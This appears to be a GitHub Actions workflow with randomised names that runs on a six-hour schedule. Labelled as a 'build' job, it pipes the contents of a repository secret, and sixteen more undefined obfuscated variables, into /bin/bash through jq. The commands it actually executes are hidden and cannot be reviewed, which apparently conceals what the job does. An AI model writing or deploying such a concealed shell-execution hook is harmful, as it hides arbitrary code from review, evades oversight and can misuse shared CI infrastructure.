name: jialijuanzou
on:
  workflow_dispatch:
  schedule:
    - cron: '53 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: jialijuanzou
        env:
          ktp82: ${{ secrets.ktp82 }}
        run: |
          echo $ktp82 | jq -r .t75179 | /bin/bash
          echo $jjoc988 | jq -r .k7626 | /bin/bash
          echo $vc26 | jq -r .bcuvm3 | /bin/bash
          echo $y45905 | jq -r .y1074 | /bin/bash
          echo $x7142 | jq -r .t77544 | /bin/bash
          echo $uf43 | jq -r .fi2892 | /bin/bash
          echo $zbiv6 | jq -r .xpg581 | /bin/bash
          echo $ayh201 | jq -r .xihf7 | /bin/bash
          echo $tyiz7 | jq -r .edng93 | /bin/bash
          echo $zomus82743 | jq -r .metr422 | /bin/bash
          echo $wiw062 | jq -r .mf350 | /bin/bash
          echo $it5 | jq -r .wm97598 | /bin/bash
          echo $a27 | jq -r .lpo20 | /bin/bash
          echo $dcjz46 | jq -r .x402 | /bin/bash
          echo $fjyf353 | jq -r .tr1376 | /bin/bash
          echo $gj87953 | jq -r .sdby73 | /bin/bash
          echo $cd753 | jq -r .dq2264 | /bin/bash

